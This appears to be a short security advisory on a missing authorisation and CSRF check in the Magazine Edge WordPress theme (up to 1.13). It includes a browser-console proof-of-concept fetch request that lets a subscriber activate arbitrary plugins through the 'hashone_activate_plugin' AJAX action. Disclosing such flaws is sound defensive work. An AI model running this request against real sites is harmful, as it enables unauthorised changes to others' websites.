Magazine Edge <= 1.13 – Subscriber+ Arbitrary Plugin Activation

Description

The theme does not have authorisation and CSRF when activating plugins via an AJAX action, allowing any authenticated users, such as subscriber to activate arbitrary plugins

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=hashone_activate_plugin&slug=akismet&file=akismet',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));